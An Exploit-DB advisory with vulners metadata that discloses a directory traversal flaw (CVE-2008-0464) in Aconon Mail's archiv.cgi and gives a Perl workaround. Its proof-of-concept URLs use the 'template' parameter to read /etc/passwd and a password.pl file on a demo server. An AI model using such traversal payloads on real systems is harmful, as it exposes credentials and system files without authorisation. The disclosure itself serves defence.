Aconon Mail 2004 - Remote Directory Traversal Vulnerability
2008-01-23T00:00:00
ID EDB-ID:4977 Type exploitdb Reporter Arno Toll Modified 2008-01-23T00:00:00
Description
Aconon Mail 2004 Remote Directory Traversal Vulnerability. CVE-2008-0464. Webapps exploit for cgi platform
Application: aconon(R) Mail
Affected versions: probably all known, tested against 2007 Enterprise
SQL 11.7.0 and 2004 Enterprise SQL 11.5.1
Affected plattforms: every, Aconon runs at (Win32, Linux, Solaris ...)
Exploitation: remote
Description: Aconon Mail is a commercial newsletter software, providing
a feature rich web interface for both, users and administrators. This
includes a public available archive of sent newsletters. Those archived
e-mails may be accessed through the web browser, processed by a template
engine. The used template may be overwritten by any user, modifying the
HTTP-GET "template" form parameter. This parameter is checked against
code injection, not against directory traversal though.
Proof of Concept:
http://www.aconon.de/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=data/password.pl&link=%3C%3C%3C%3C
vhttp://www.aconon.de/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=../../../../../../etc/passwd&link=%3C%3C%3C%3C
Fix:
No fix has been published yet. However this workaround should patch the
issue:
Add in archiv.cgi below
$FORM{'template'} =~ s/\|//g;
this code:
use File::Basename;
$FORM{'template'} = ($FORM{'template'}) ? basename($FORM{'template'})
: "";
if ($FORM{'template'} && $FORM{'template'} !~ /\.html$/) {
&error ("$TXT{'1501'}");
}
Status: the vendor has been informed.
German readers of the list may also read
http://burnachurch.com/67/directory-traversal-luecke-in-aconon-mail/
P.S. greets to missi - you're great :o)
# milw0rm.com [2008-01-23]
{"hash": "cdd6a0b4edd0380e4751c6525edc083d1a8a50e87e9a2725aaca53dbf88c60dd", "id": "EDB-ID:4977", "lastseen": "2016-01-31T22:14:30", "viewCount": 1, "bulletinFamily": "exploit", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "edition": 1, "history": [], "enchantments": {"vulnersScore": 5.0}, "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/4977/", "description": "Aconon Mail 2004 Remote Directory Traversal Vulnerability. CVE-2008-0464. Webapps exploit for cgi platform", "title": "Aconon Mail 2004 - Remote Directory Traversal Vulnerability", "sourceData": "Application: aconon(R) Mail\n\nAffected versions: probably all known, tested against 2007 Enterprise\nSQL 11.7.0 and 2004 Enterprise SQL 11.5.1\n\nAffected plattforms: every, Aconon runs at (Win32, Linux, Solaris ...)\n\nExploitation: remote\n\nDescription: Aconon Mail is a commercial newsletter software, providing\na feature rich web interface for both, users and administrators. This\nincludes a public available archive of sent newsletters. Those archived\ne-mails may be accessed through the web browser, processed by a template\n engine. The used template may be overwritten by any user, modifying the\nHTTP-GET \"template\" form parameter. This parameter is checked against\ncode injection, not against directory traversal though.\n\nProof of Concept:\n\nhttp://www.aconon.de/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=data/password.pl&link=%3C%3C%3C%3C\nvhttp://www.aconon.de/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=../../../../../../etc/passwd&link=%3C%3C%3C%3C\n\nFix:\n\nNo fix has been published yet. However this workaround should patch the\nissue:\n\nAdd in archiv.cgi below\n $FORM{'template'} =~ s/\\|//g;\n\nthis code:\n\n use File::Basename;\n $FORM{'template'} = ($FORM{'template'}) ? basename($FORM{'template'})\n: \"\";\n if ($FORM{'template'} && $FORM{'template'} !~ /\\.html$/) {\n &error (\"$TXT{'1501'}\");\n }\n\nStatus: the vendor has been informed.\n\n\nGerman readers of the list may also read\nhttp://burnachurch.com/67/directory-traversal-luecke-in-aconon-mail/\n\nP.S. greets to missi - you're great :o)\n\n# milw0rm.com [2008-01-23]\n", "objectVersion": "1.0", "cvelist": ["CVE-2008-0464"], "published": "2008-01-23T00:00:00", "osvdbidlist": ["40479"], "references": [], "reporter": "Arno Toll", "modified": "2008-01-23T00:00:00", "href": "https://www.exploit-db.com/exploits/4977/"}
{"result": {"cve": [{"id": "CVE-2008-0464", "type": "cve", "title": "CVE-2008-0464", "description": "Directory traversal vulnerability in archiv.cgi in absofort aconon Mail 2007 Enterprise SQL 11.7.0 and Mail 2004 Enterprise SQL 11.5.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the template parameter.", "published": "2008-01-25T11:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0464", "cvelist": ["CVE-2008-0464"], "lastseen": "2017-09-29T14:25:44"}]}}